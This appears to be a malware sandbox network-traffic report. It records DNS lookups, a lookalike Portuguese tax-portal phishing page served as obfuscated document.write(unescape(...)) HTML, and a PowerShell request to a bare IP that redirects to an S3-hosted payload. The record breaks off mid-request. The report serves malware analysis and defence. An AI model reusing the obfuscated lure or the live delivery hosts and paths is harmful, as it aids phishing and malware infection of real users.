May 22, 2025 14:03:29.941977024 CEST	1.1.1.1	192.168.2.6	0x8211	No error (0)	s3-r-w.us-east-2.amazonaws.com		52.219.177.226	A (IP address)	IN (0x0001)	false
May 22, 2025 14:03:29.941977024 CEST	1.1.1.1	192.168.2.6	0x8211	No error (0)	s3-r-w.us-east-2.amazonaws.com		52.219.178.34	A (IP address)	IN (0x0001)	false
May 22, 2025 14:03:29.941977024 CEST	1.1.1.1	192.168.2.6	0x8211	No error (0)	s3-r-w.us-east-2.amazonaws.com		3.5.133.118	A (IP address)	IN (0x0001)	false
May 22, 2025 14:03:29.941977024 CEST	1.1.1.1	192.168.2.6	0x8211	No error (0)	s3-r-w.us-east-2.amazonaws.com		3.5.128.158	A (IP address)	IN (0x0001)	false
May 22, 2025 14:03:29.941977024 CEST	1.1.1.1	192.168.2.6	0x8211	No error (0)	s3-r-w.us-east-2.amazonaws.com		3.5.131.158	A (IP address)	IN (0x0001)	false
May 22, 2025 14:03:29.941977024 CEST	1.1.1.1	192.168.2.6	0x8211	No error (0)	s3-r-w.us-east-2.amazonaws.com		3.5.131.242	A (IP address)	IN (0x0001)	false
May 22, 2025 14:04:02.381982088 CEST	1.1.1.1	192.168.2.6	0x4ff9	No error (0)	ld-cxhaspe-20-05-p.s3.us-east-2.amazonaws.com	s3-r-w.us-east-2.amazonaws.com		CNAME (Canonical name)	IN (0x0001)	false
May 22, 2025 14:04:02.381982088 CEST	1.1.1.1	192.168.2.6	0x4ff9	No error (0)	s3-r-w.us-east-2.amazonaws.com		52.219.178.178	A (IP address)	IN (0x0001)	false
May 22, 2025 14:04:02.381982088 CEST	1.1.1.1	192.168.2.6	0x4ff9	No error (0)	s3-r-w.us-east-2.amazonaws.com		16.12.64.34	A (IP address)	IN (0x0001)	false
May 22, 2025 14:04:02.381982088 CEST	1.1.1.1	192.168.2.6	0x4ff9	No error (0)	s3-r-w.us-east-2.amazonaws.com		52.219.179.138	A (IP address)	IN (0x0001)	false
May 22, 2025 14:04:02.381982088 CEST	1.1.1.1	192.168.2.6	0x4ff9	No error (0)	s3-r-w.us-east-2.amazonaws.com		3.5.130.117	A (IP address)	IN (0x0001)	false
May 22, 2025 14:04:02.381982088 CEST	1.1.1.1	192.168.2.6	0x4ff9	No error (0)	s3-r-w.us-east-2.amazonaws.com		52.219.92.186	A (IP address)	IN (0x0001)	false
May 22, 2025 14:04:02.381982088 CEST	1.1.1.1	192.168.2.6	0x4ff9	No error (0)	s3-r-w.us-east-2.amazonaws.com		3.5.133.165	A (IP address)	IN (0x0001)	false
May 22, 2025 14:04:02.381982088 CEST	1.1.1.1	192.168.2.6	0x4ff9	No error (0)	s3-r-w.us-east-2.amazonaws.com		3.5.129.15	A (IP address)	IN (0x0001)	false
May 22, 2025 14:04:02.381982088 CEST	1.1.1.1	192.168.2.6	0x4ff9	No error (0)	s3-r-w.us-east-2.amazonaws.com		3.5.130.39	A (IP address)	IN (0x0001)	false
May 22, 2025 14:04:49.290400028 CEST	1.1.1.1	192.168.2.6	0xee03	No error (0)	ld-cxhaspe-20-05-p.s3.us-east-2.amazonaws.com	s3-r-w.us-east-2.amazonaws.com		CNAME (Canonical name)	IN (0x0001)	false
May 22, 2025 14:04:49.290400028 CEST	1.1.1.1	192.168.2.6	0xee03	No error (0)	s3-r-w.us-east-2.amazonaws.com		16.12.66.138	A (IP address)	IN (0x0001)	false
May 22, 2025 14:04:49.290400028 CEST	1.1.1.1	192.168.2.6	0xee03	No error (0)	s3-r-w.us-east-2.amazonaws.com		3.5.128.64	A (IP address)	IN (0x0001)	false
May 22, 2025 14:04:49.290400028 CEST	1.1.1.1	192.168.2.6	0xee03	No error (0)	s3-r-w.us-east-2.amazonaws.com		3.5.132.126	A (IP address)	IN (0x0001)	false
May 22, 2025 14:04:49.290400028 CEST	1.1.1.1	192.168.2.6	0xee03	No error (0)	s3-r-w.us-east-2.amazonaws.com		3.5.129.180	A (IP address)	IN (0x0001)	false
May 22, 2025 14:04:49.290400028 CEST	1.1.1.1	192.168.2.6	0xee03	No error (0)	s3-r-w.us-east-2.amazonaws.com		3.5.130.182	A (IP address)	IN (0x0001)	false
May 22, 2025 14:04:49.290400028 CEST	1.1.1.1	192.168.2.6	0xee03	No error (0)	s3-r-w.us-east-2.amazonaws.com		52.219.93.170	A (IP address)	IN (0x0001)	false
May 22, 2025 14:04:49.290400028 CEST	1.1.1.1	192.168.2.6	0xee03	No error (0)	s3-r-w.us-east-2.amazonaws.com		52.219.111.250	A (IP address)	IN (0x0001)	false
May 22, 2025 14:04:49.290400028 CEST	1.1.1.1	192.168.2.6	0xee03	No error (0)	s3-r-w.us-east-2.amazonaws.com		52.219.176.98	A (IP address)	IN (0x0001)	false
May 22, 2025 14:05:11.894457102 CEST	1.1.1.1	192.168.2.6	0x44d3	No error (0)	ld-cxhaspe-20-05-p.s3.us-east-2.amazonaws.com	s3-r-w.us-east-2.amazonaws.com		CNAME (Canonical name)	IN (0x0001)	false
May 22, 2025 14:05:11.894457102 CEST	1.1.1.1	192.168.2.6	0x44d3	No error (0)	s3-r-w.us-east-2.amazonaws.com		3.5.128.1	A (IP address)	IN (0x0001)	false
May 22, 2025 14:05:11.894457102 CEST	1.1.1.1	192.168.2.6	0x44d3	No error (0)	s3-r-w.us-east-2.amazonaws.com		3.5.132.36	A (IP address)	IN (0x0001)	false
May 22, 2025 14:05:11.894457102 CEST	1.1.1.1	192.168.2.6	0x44d3	No error (0)	s3-r-w.us-east-2.amazonaws.com		52.219.233.82	A (IP address)	IN (0x0001)	false
May 22, 2025 14:05:11.894457102 CEST	1.1.1.1	192.168.2.6	0x44d3	No error (0)	s3-r-w.us-east-2.amazonaws.com		3.5.132.234	A (IP address)	IN (0x0001)	false
May 22, 2025 14:05:11.894457102 CEST	1.1.1.1	192.168.2.6	0x44d3	No error (0)	s3-r-w.us-east-2.amazonaws.com		3.5.131.101	A (IP address)	IN (0x0001)	false
May 22, 2025 14:05:11.894457102 CEST	1.1.1.1	192.168.2.6	0x44d3	No error (0)	s3-r-w.us-east-2.amazonaws.com		52.219.109.106	A (IP address)	IN (0x0001)	false
May 22, 2025 14:05:11.894457102 CEST	1.1.1.1	192.168.2.6	0x44d3	No error (0)	s3-r-w.us-east-2.amazonaws.com		52.219.229.34	A (IP address)	IN (0x0001)	false
May 22, 2025 14:05:11.894457102 CEST	1.1.1.1	192.168.2.6	0x44d3	No error (0)	s3-r-w.us-east-2.amazonaws.com		3.5.132.193	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

at-portaldasfinancas.org

slscr.update.microsoft.com

ld-cxhaspe-20-05-p.s3.us-east-2.amazonaws.com

c.pki.goog

18.218.213.93

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port
0	192.168.2.6	49706	74.125.137.94	80

Timestamp	Bytes transferred	Direction	Data
May 22, 2025 14:02:30.612353086 CEST	200	OUT	GET /r/r4.crl HTTP/1.1 Cache-Control: max-age = 3000 Connection: Keep-Alive Accept: / If-Modified-Since: Thu, 25 Jul 2024 14:48:00 GMT User-Agent: Microsoft-CryptoAPI/10.0 Host: c.pki.goog
May 22, 2025 14:02:30.791408062 CEST	1243	IN	HTTP/1.1 200 OK Accept-Ranges: bytes Content-Security-Policy-Report-Only: require-trusted-types-for 'script'; report-uri https://csp.withgoogle.com/csp/cacerts Cross-Origin-Resource-Policy: cross-origin Cross-Origin-Opener-Policy: same-origin; report-to="cacerts" Report-To: {"group":"cacerts","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/cacerts"}]} Content-Length: 530 X-Content-Type-Options: nosniff Server: sffe X-XSS-Protection: 0 Date: Thu, 22 May 2025 11:36:48 GMT Expires: Thu, 22 May 2025 12:26:48 GMT Cache-Control: public, max-age=3000 Age: 1542 Last-Modified: Thu, 03 Apr 2025 14:18:00 GMT Content-Type: application/pkix-crl Vary: Accept-Encoding Data Raw: 30 82 02 0e 30 82 01 93 02 01 01 30 0a 06 08 2a 86 48 ce 3d 04 03 03 30 47 31 0b 30 09 06 03 55 04 06 13 02 55 53 31 22 30 20 06 03 55 04 0a 13 19 47 6f 6f 67 6c 65 20 54 72 75 73 74 20 53 65 72 76 69 63 65 73 20 4c 4c 43 31 14 30 12 06 03 55 04 03 13 0b 47 54 53 20 52 6f 6f 74 20 52 34 17 0d 32 35 30 34 30 33 30 38 30 30 30 30 5a 17 0d 32 36 30 32 32 38 30 37 35 39 35 39 5a 30 81 e9 30 2f 02 10 6e 47 a9 ce 4f 46 c2 3d e2 49 ea cc 38 94 53 73 17 0d 31 39 30 39 33 30 30 30 30 30 30 30 5a 30 0c 30 0a 06 03 55 1d 15 04 03 0a 01 05 30 2c 02 0d 01 f0 9c 5b 70 05 a6 dc 86 e2 f9 9e f3 17 0d 32 30 30 31 33 31 30 30 30 30 30 30 5a 30 0c 30 0a 06 03 55 1d 15 04 03 0a 01 05 30 2c 02 0d 01 fe a5 81 44 7e 3b fd 3b b8 1c 24 98 17 0d 32 33 30 36 31 33 30 30 30 30 30 30 5a 30 0c 30 0a 06 03 55 1d 15 04 03 0a 01 05 30 2c 02 0d 02 16 68 25 e1 70 04 40 61 24 91 f5 40 17 0d 32 35 30 34 30 33 30 38 30 30 30 30 5a 30 0c 30 0a 06 03 55 1d 15 04 03 0a 01 05 30 2c 02 0d 02 00 8e b2 58 e7 b5 94 0c 1f f9 00 44 17 0d 32 35 30 [TRUNCATED] Data Ascii: 000H=0G10UUS1"0 UGoogle Trust Services LLC10UGTS Root R4250403080000Z260228075959Z00/nGOF=I8Ss190930000000Z00U0,[p200131000000Z00U0,D~;;$230613000000Z00U0,h%p@a$@250403080000Z00U0,XD250403080000Z00U/0-0U0U#0LtI6>j0H=i0f1>2en:IN@g=;bQZ~`NX1?^4y[$\4{;$zDeU6O

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.6	49708	18.218.213.93	80	6452	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Timestamp	Bytes transferred	Direction	Data
May 22, 2025 14:02:39.868079901 CEST	165	OUT	GET /187.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: 18.218.213.93 Connection: Keep-Alive
May 22, 2025 14:02:40.726252079 CEST	279	IN	HTTP/1.1 302 Found Date: Thu, 22 May 2025 12:02:39 GMT Server: Apache/2.4.58 (Ubuntu) Location: https://ld-cxhaspe-20-05-p.s3.us-east-2.amazonaws.com/CMiEZso Content-Length: 0 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49696	195.54.163.111	443	5984	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-05-22 12:02:27 UTC	692	OUT	GET /FAT/Comprovativo_Dezembro_zStFJpzx_19-05-2025_210.php HTTP/1.1 host: at-portaldasfinancas.org sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" upgrade-insecure-requests: 1 user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 sec-fetch-site: cross-site sec-fetch-mode: navigate sec-fetch-dest: document accept-encoding: identity accept-language: en-US,en;q=0.9 priority: u=0, i
2025-05-22 12:02:27 UTC	344	IN	HTTP/1.1 200 OK x-powered-by: PHP/8.3.20 content-type: text/html; charset=UTF-8 date: Thu, 22 May 2025 12:02:25 GMT server: LiteSpeed alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46" content-length: 1103218
2025-05-22 12:02:27 UTC	1460	IN	Data Raw: ef bb bf ef bb bf 3c 73 63 72 69 70 74 3e 0d 0a 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 75 6e 65 73 63 61 70 65 28 27 25 33 43 25 32 31 44 4f 43 54 59 50 45 25 32 30 68 74 6d 6c 25 33 45 25 30 44 25 30 41 25 33 43 73 75 6d 6d 61 72 79 25 32 30 68 69 64 64 65 6e 25 33 45 67 64 78 64 70 61 62 77 6c 66 72 76 64 70 79 69 77 6c 68 6b 72 73 77 6c 64 76 76 66 74 62 66 6f 72 68 65 68 64 73 61 6b 69 6e 70 79 63 79 6b 66 75 79 64 78 61 69 78 6b 78 72 7a 65 72 6f 61 77 65 6f 61 61 71 6d 71 6c 66 76 67 77 78 78 6d 69 66 69 66 66 67 70 6b 73 6a 6a 68 73 6e 69 62 74 64 6f 6a 77 6a 70 64 72 61 77 64 67 69 75 79 6d 73 6d 70 63 70 79 73 62 70 76 6b 72 67 74 66 63 69 6a 6a 75 74 6f 79 78 62 73 7a 61 6a 65 76 6e 62 6d 70 6f 73 79 6d 6e 61 64 65 62 79 6f 72 79 70 64 6e Data Ascii: <script>document.write(unescape('%3C%21DOCTYPE%20html%3E%0D%0A%3Csummary%20hidden%3Egdxdpabwlfrvdpyiwlhkrswldvvftbforhehdsakinpycykfuydxaixkxrzeroaweoaaqmqlfvgwxxmififfgpksjjhsnibtdojwjpdrawdgiuymsmpcpysbpvkrgtfcijjutoyxbszajevnbmposymnadebyorypdn
2025-05-22 12:02:27 UTC	1460	IN	Data Raw: 66 6c 6a 67 61 65 68 6a 64 71 6a 72 79 71 74 67 74 71 6d 71 6a 6a 6d 62 76 62 76 71 65 6b 77 75 7a 73 78 71 73 79 62 6c 62 6a 68 63 6a 68 6a 76 6e 79 79 75 79 70 74 73 7a 67 72 75 61 61 67 6e 73 61 71 6e 6d 71 6b 6e 76 74 71 6d 78 64 73 6f 79 75 72 6a 61 65 62 64 6e 63 6b 79 64 78 64 66 6a 6a 6b 78 72 65 78 67 61 75 76 7a 6a 69 7a 64 65 65 73 72 7a 67 65 63 64 72 6c 6a 6e 65 77 71 68 78 66 66 76 76 6a 6d 6f 75 6b 7a 79 62 6e 6d 72 6e 64 63 6e 63 61 71 76 6c 6f 70 6a 68 78 78 61 65 6b 7a 75 62 78 69 6c 67 69 64 7a 79 7a 74 62 6a 6c 6b 71 6c 76 79 76 61 74 6c 67 78 61 69 69 75 6d 62 70 72 76 66 64 79 71 6b 64 74 68 6c 67 6e 68 6f 6d 61 61 6e 6f 68 68 78 78 79 68 6c 66 74 69 70 70 6f 73 73 64 76 73 77 67 6f 70 66 6c 62 71 75 6e 61 69 65 75 6b 70 67 69 6f 79 Data Ascii: fljgaehjdqjryqtgtqmqjjmbvbvqekwuzsxqsyblbjhcjhjvnyyuyptszgruaagnsaqnmqknvtqmxdsoyurjaebdnckydxdfjjkxrexgauvzjizdeesrzgecdrljnewqhxffvvjmoukzybnmrndcncaqvlopjhxxaekzubxilgidzyztbjlkqlvyvatlgxaiiumbprvfdyqkdthlgnhomaanohhxxyhlftippossdvswgopflbqunaieukpgioy
2025-05-22 12:02:27 UTC	1460	IN	Data Raw: 67 65 67 78 78 69 6d 6b 72 6c 63 6f 63 6a 6f 6a 7a 79 70 6e 6a 77 71 6f 7a 6a 61 7a 6a 64 6c 69 6c 6e 66 6e 77 64 78 66 70 6c 76 7a 6a 6d 71 62 6d 69 79 6d 6b 68 68 77 70 68 6d 63 65 66 62 75 63 6c 6f 65 74 6a 63 79 69 77 7a 61 71 65 61 6e 6a 6c 71 75 65 6d 66 6e 66 75 62 73 63 68 68 79 6e 6a 73 72 73 76 72 6d 76 64 6d 6c 70 6c 79 70 61 75 64 6b 78 6e 64 6b 77 6d 74 73 77 6e 6d 73 6a 77 66 79 63 74 6e 75 66 79 6c 69 65 6c 75 6b 66 65 64 6c 63 72 65 74 75 64 78 69 6f 66 66 6b 6b 76 79 69 6d 6e 74 66 76 67 6a 62 6f 73 69 68 77 6e 71 68 6d 6c 6d 78 6f 77 7a 62 6d 79 67 6c 73 6b 7a 69 76 74 75 68 6b 65 76 65 65 78 6c 78 66 64 76 70 61 72 70 70 78 78 76 6e 65 70 74 6f 73 78 73 72 65 6c 66 76 75 66 75 6e 72 61 6a 62 73 6d 67 67 7a 69 68 73 77 77 6d 74 6d 67 79 Data Ascii: gegxximkrlcocjojzypnjwqozjazjdlilnfnwdxfplvzjmqbmiymkhhwphmcefbucloetjcyiwzaqeanjlquemfnfubschhynjsrsvrmvdmlplypaudkxndkwmtswnmsjwfyctnufylielukfedlcretudxioffkkvyimntfvgjbosihwnqhmlmxowzbmyglskzivtuhkeveexlxfdvparppxxvneptosxsrelfvufunrajbsmggzihswwmtmgy
2025-05-22 12:02:27 UTC	1460	IN	Data Raw: 6d 67 77 71 6d 73 65 77 64 73 64 68 6a 67 6e 6a 79 70 69 64 6b 77 66 64 7a 6b 7a 64 73 72 65 61 67 6e 6e 73 6d 66 77 67 63 63 71 74 6e 6b 78 6f 72 64 79 6d 73 66 6b 78 68 67 64 6a 67 78 69 70 7a 73 6f 66 69 73 62 62 79 6a 74 78 6b 61 75 79 74 6d 72 6e 72 64 79 78 64 76 69 63 71 67 70 72 63 70 61 73 68 6b 61 78 70 66 79 6b 74 6d 79 65 75 6b 71 7a 73 7a 65 76 72 61 66 63 73 65 78 62 67 63 61 64 74 76 65 72 69 74 7a 65 71 68 6b 66 6f 61 62 77 6a 6a 73 73 66 7a 71 6c 72 69 6a 75 6b 6d 61 6f 6e 72 68 6e 70 66 77 6b 68 68 6d 67 64 73 6f 6c 6c 66 6b 76 6c 63 75 6b 78 72 6b 68 73 64 74 6a 6d 7a 69 75 66 65 77 6d 67 6e 72 75 74 62 7a 63 62 6f 69 73 65 62 7a 6e 62 6a 73 61 70 76 63 64 77 7a 6e 65 63 6a 6c 64 67 68 76 6d 62 77 6a 71 6f 77 77 63 6e 74 78 71 7a 78 66 Data Ascii: mgwqmsewdsdhjgnjypidkwfdzkzdsreagnnsmfwgccqtnkxordymsfkxhgdjgxipzsofisbbyjtxkauytmrnrdyxdvicqgprcpashkaxpfyktmyeukqzszevrafcsexbgcadtveritzeqhkfoabwjjssfzqlrijukmaonrhnpfwkhhmgdsollfkvlcukxrkhsdtjmziufewmgnrutbzcboisebznbjsapvcdwznecjldghvmbwjqowwcntxqzxf
2025-05-22 12:02:27 UTC	1460	IN	Data Raw: 72 6c 7a 71 68 6f 73 76 70 6c 67 6a 6c 6d 76 77 6a 69 69 75 6b 6b 75 66 64 6f 68 66 6c 70 69 73 72 63 7a 63 6c 7a 6c 65 61 70 62 75 6c 69 69 61 72 79 76 77 79 62 6a 6f 67 74 65 6d 70 68 62 6d 25 33 43 25 32 46 73 70 61 6e 25 33 45 25 30 44 25 30 41 25 30 44 25 30 41 25 33 43 68 74 6d 6c 25 32 30 6c 61 6e 67 25 33 44 25 32 32 70 74 2d 50 54 25 32 32 25 33 45 25 30 44 25 30 41 25 33 43 69 6e 70 75 74 25 32 30 74 79 70 65 25 33 44 25 32 32 62 7a 70 62 76 64 71 64 78 64 68 71 65 6a 7a 75 6b 6c 71 6d 73 70 64 65 75 69 77 75 79 79 69 71 68 6c 76 69 75 66 63 79 74 77 69 64 79 62 74 67 63 74 75 72 68 76 77 61 6f 6d 6f 70 6b 6a 70 77 6b 70 66 76 79 66 65 73 63 6e 68 6b 65 6b 6d 6c 79 75 6d 6c 67 69 65 63 6b 74 67 62 76 75 6e 72 70 71 61 68 68 79 6b 63 72 6d 79 66 Data Ascii: rlzqhosvplgjlmvwjiiukkufdohflpisrczclzleapbuliiaryvwybjogtemphbm%3C%2Fspan%3E%0D%0A%0D%0A%3Chtml%20lang%3D%22pt-PT%22%3E%0D%0A%3Cinput%20type%3D%22bzpbvdqdxdhqejzuklqmspdeuiwuyyiqhlviufcytwidybtgcturhvwaomopkjpwkpfvyfescnhkekmlyumlgiecktgbvunrpqahhykcrmyf
2025-05-22 12:02:27 UTC	1460	IN	Data Raw: 68 6f 65 61 6d 6e 6c 63 67 6e 79 68 72 6f 69 67 66 79 76 73 72 6e 79 63 75 67 6e 66 6b 6d 68 61 61 73 68 69 69 61 6d 77 75 71 66 63 65 79 65 63 6c 7a 75 78 67 6c 66 6a 62 6e 65 6f 75 78 78 76 79 74 78 66 6d 77 6a 75 62 74 7a 64 7a 79 67 75 6e 64 71 77 65 75 79 6f 79 64 6f 7a 74 61 61 76 79 68 6a 65 70 67 76 6b 6d 6f 66 63 66 75 75 61 6c 67 78 68 66 76 77 69 61 78 72 65 71 67 62 74 63 66 6a 61 6f 70 74 6f 72 62 62 75 6b 61 66 71 6d 69 69 62 6b 65 62 71 64 78 77 64 62 66 70 70 76 73 74 76 6f 71 68 69 71 6c 7a 69 67 6b 68 76 62 70 79 6b 61 71 75 72 67 6e 73 64 75 74 6d 73 73 65 71 76 78 68 77 61 6e 65 73 63 72 78 61 79 79 72 7a 74 6f 67 71 78 74 69 61 70 79 7a 75 6d 71 68 6c 71 69 73 65 66 74 7a 64 73 78 74 6f 71 65 67 79 73 76 69 6a 62 64 64 78 68 77 69 78 Data Ascii: hoeamnlcgnyhroigfyvsrnycugnfkmhaashiiamwuqfceyeclzuxglfjbneouxxvytxfmwjubtzdzygundqweuyoydoztaavyhjepgvkmofcfuualgxhfvwiaxreqgbtcfjaoptorbbukafqmiibkebqdxwdbfppvstvoqhiqlzigkhvbpykaqurgnsdutmsseqvxhwanescrxayyrztogqxtiapyzumqhlqiseftzdsxtoqegysvijbddxhwix
2025-05-22 12:02:27 UTC	1460	IN	Data Raw: 67 70 6a 67 65 77 6d 76 76 66 68 74 77 6b 6f 6a 64 62 71 67 72 65 6b 74 6d 62 72 66 6a 65 62 6c 79 62 6e 61 74 66 6c 78 66 6a 64 62 77 67 65 7a 70 65 61 6b 75 76 6e 67 77 7a 6c 65 6e 6d 6a 73 69 61 67 79 64 67 66 78 74 72 72 66 6e 7a 7a 70 63 79 6f 75 68 7a 61 63 74 7a 63 69 7a 67 61 73 68 69 73 73 73 62 62 66 69 6e 67 6c 66 67 69 66 73 6a 71 64 76 75 69 74 69 70 61 61 6a 67 6e 6e 77 64 6e 65 63 61 6d 6c 64 70 6c 65 72 7a 77 62 72 72 77 6d 62 77 63 61 75 71 78 73 6c 6f 6e 6d 6f 75 6b 6b 67 76 6a 6e 72 76 61 63 79 6c 6b 6f 6c 68 64 7a 64 77 68 79 74 63 74 68 6b 6e 63 66 77 76 6a 75 68 68 71 6f 6f 69 64 63 64 61 62 6c 76 7a 71 65 67 76 61 75 61 68 73 75 6e 72 6d 6d 74 65 73 7a 70 70 73 61 74 6f 63 6b 76 6c 67 72 74 73 72 75 79 62 74 61 72 73 68 6e 6b 76 63 Data Ascii: gpjgewmvvfhtwkojdbqgrektmbrfjeblybnatflxfjdbwgezpeakuvngwzlenmjsiagydgfxtrrfnzzpcyouhzactzcizgashisssbbfinglfgifsjqdvuitipaajgnnwdnecamldplerzwbrrwmbwcauqxslonmoukkgvjnrvacylkolhdzdwhytcthkncfwvjuhhqooidcdablvzqegvauahsunrmmteszppsatockvlgrtsruybtarshnkvc
2025-05-22 12:02:27 UTC	1460	IN	Data Raw: 73 79 62 69 75 68 67 76 69 6f 71 6d 70 6f 70 62 68 78 73 71 67 6d 65 64 66 79 75 61 77 7a 76 7a 70 63 65 76 75 79 63 6b 6d 65 71 69 7a 62 6f 67 71 68 75 72 6d 75 6c 66 65 74 6d 76 76 6b 78 77 7a 65 6a 70 6e 74 6f 6d 7a 67 63 70 6b 69 77 63 76 71 62 79 67 62 72 69 65 64 70 6e 79 6d 6b 6c 64 6b 6e 72 64 6b 77 65 74 7a 6d 68 71 64 68 73 6a 67 70 71 76 63 64 72 67 6a 72 69 61 61 67 7a 73 63 74 69 62 76 6b 75 78 77 6d 76 70 6d 75 6e 7a 73 71 64 73 79 6b 72 72 63 6f 73 64 66 6c 79 70 7a 6c 63 77 66 76 77 7a 71 61 74 6e 70 6f 63 72 74 73 64 73 79 67 63 7a 64 68 6c 72 6c 6b 64 78 79 68 75 6f 7a 63 68 6f 67 68 61 76 61 64 6b 72 6b 6e 6f 76 71 73 76 62 71 66 6d 66 68 73 6f 7a 63 63 6d 66 76 69 64 70 78 74 72 67 6e 65 6e 6d 79 64 6f 6a 77 62 62 78 77 78 62 6e 70 67 Data Ascii: sybiuhgvioqmpopbhxsqgmedfyuawzvzpcevuyckmeqizbogqhurmulfetmvvkxwzejpntomzgcpkiwcvqbygbriedpnymkldknrdkwetzmhqdhsjgpqvcdrgjriaagzsctibvkuxwmvpmunzsqdsykrrcosdflypzlcwfvwzqatnpocrtsdsygczdhlrlkdxyhuozchoghavadkrknovqsvbqfmfhsozccmfvidpxtrgnenmydojwbbxwxbnpg
2025-05-22 12:02:27 UTC	1460	IN	Data Raw: 6f 74 67 71 63 70 62 71 6e 70 6e 70 6c 79 68 6a 72 70 6d 79 70 78 6b 7a 70 77 66 77 70 70 71 6f 6c 71 77 74 70 75 69 72 72 6c 71 6f 6b 6c 71 71 62 72 6e 6c 72 61 74 64 71 61 6d 79 77 61 71 6e 71 77 68 70 79 69 61 6a 6b 74 69 6a 70 73 25 33 43 25 32 46 6c 61 62 65 6c 25 33 45 25 30 44 25 30 41 25 30 44 25 30 41 25 33 43 68 65 61 64 25 33 45 25 30 44 25 30 41 25 33 43 69 6d 67 25 32 30 73 72 63 25 33 44 25 32 32 6a 6c 65 6b 69 6e 6a 6f 7a 7a 61 6f 6f 72 6e 7a 61 6f 6f 6a 6a 6e 6f 63 67 64 6e 62 79 6b 61 63 70 79 73 6a 75 6d 61 6a 69 6d 67 63 73 6b 71 6d 67 79 6e 63 67 79 76 6f 75 64 73 71 70 74 77 65 69 7a 74 66 62 61 6b 62 68 68 6e 69 61 63 72 71 6a 6d 64 62 67 6a 73 74 73 66 62 75 64 73 6d 6e 64 62 6b 79 71 68 63 74 66 66 76 6d 74 69 62 77 6f 68 65 77 6f Data Ascii: otgqcpbqnpnplyhjrpmypxkzpwfwppqolqwtpuirrlqoklqqbrnlratdqamywaqnqwhpyiajktijps%3C%2Flabel%3E%0D%0A%0D%0A%3Chead%3E%0D%0A%3Cimg%20src%3D%22jlekinjozzaoornzaoojjnocgdnbykacpysjumajimgcskqmgyncgyvoudsqptweiztfbakbhhniacrqjmdbgjstsfbudsmndbkyqhctffvmtibwohewo
2025-05-22 12:02:27 UTC	1460	IN	Data Raw: 65 69 74 62 66 6a 71 6f 68 6d 73 6d 62 61 72 78 61 79 69 62 67 73 6a 76 68 68 61 6a 6e 6b 6b 64 76 65 79 62 6b 64 6a 66 63 69 73 72 79 64 76 79 78 76 63 64 68 63 71 66 61 67 71 74 6e 69 7a 76 78 78 6b 6b 68 77 74 76 6e 79 72 77 6b 76 6d 73 76 70 6f 77 71 6b 77 6f 6f 6b 75 68 6c 65 6d 63 79 68 69 6d 6c 69 71 67 69 78 62 67 6b 71 76 76 78 71 6f 65 71 79 6d 67 6a 78 71 76 77 64 75 67 72 6a 65 77 77 6a 66 6b 70 62 73 66 65 68 68 63 6f 6f 66 69 74 68 68 79 65 67 70 6a 71 6d 76 72 64 6c 72 6a 72 65 74 6f 71 6e 72 6b 67 75 6f 70 6a 69 76 74 76 65 67 6d 78 64 69 66 78 78 61 61 6f 79 76 64 68 66 79 67 62 70 64 74 68 69 6e 70 67 62 7a 66 79 74 71 61 73 6e 72 77 79 66 77 69 6c 73 74 6e 6b 63 71 67 72 77 72 6b 68 6c 6c 72 6a 63 6f 71 68 67 78 78 63 71 77 65 6c 6f 66 Data Ascii: eitbfjqohmsmbarxayibgsjvhhajnkkdveybkdjfcisrydvyxvcdhcqfagqtnizvxxkkhwtvnyrwkvmsvpowqkwookuhlemcyhimliqgixbgkqvvxqoeqymgjxqvwdugrjewwjfkpbsfehhcoofithhyegpjqmvrdlrjretoqnrkguopjivtvegmxdifxxaaoyvdhfygbpdthinpgbzfytqasnrwyfwilstnkcqgrwrkhllrjcoqhgxxcqwelof
2025-05-22 12:02:27 UTC	1435	OUT	GET /FAT/jlekinjozzaoornzaoojjnocgdnbykacpysjumajimgcskqmgyncgyvoudsqptweiztfbakbhhniacrqjmdbgjstsfbudsmndbkyqhctffvmtibwohewoqjnbueoljtdvybtguwvtjlcmujyiurintguapxatdajnrlexduxubuaznmthpxqrcbxeoiqmquuoolxvifwnxqgisnmmqlbzeshhzubhrtflbfynnrxgswcvxxqbbagmulujfxfclysbadnsczjspucavfwmhsbpaqjqbmhcgqqnkxcjufwtxwbrmjdnyupxfahsmrqsuhocokktosimftzwcmqbytegvnbhpuzpwrhjyvkjnawjimfyeyvilllutiljzlfrqvwfjnkxeywajggjliktvwgvawmhhmnelyrswgujdozjroxzyoictirbywkonzhlyogdsviajebmwcgvxtthcibgbgswvhffylldklaibjhuswmguienbrbpeeeitbfjqohmsmbarxayibgsjvhhajnkkdveybkdjfcisrydvyxvcdhcqfagqtnizvxxkkhwtvnyrwkvmsvpowqkwookuhlemcyhimliqgixbgkqvvxqoeqymgjxqvwdugrjewwjfkpbsfehhcoofithhyegpjqmvrdlrjretoqnrkguopjivtvegmxdifxxaaoyvdhfygbpdthinpgbzfytqasnrwyfwilstnkcqgrwrkhllrjcoqhgxxcqwelofrpszbxvymndcvmwssceqhmfvvtwgbghbpahgrznggznjpj HTTP/1.1 host: at-portaldasfinancas.org sec-ch-ua-platform: "Windows" user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) 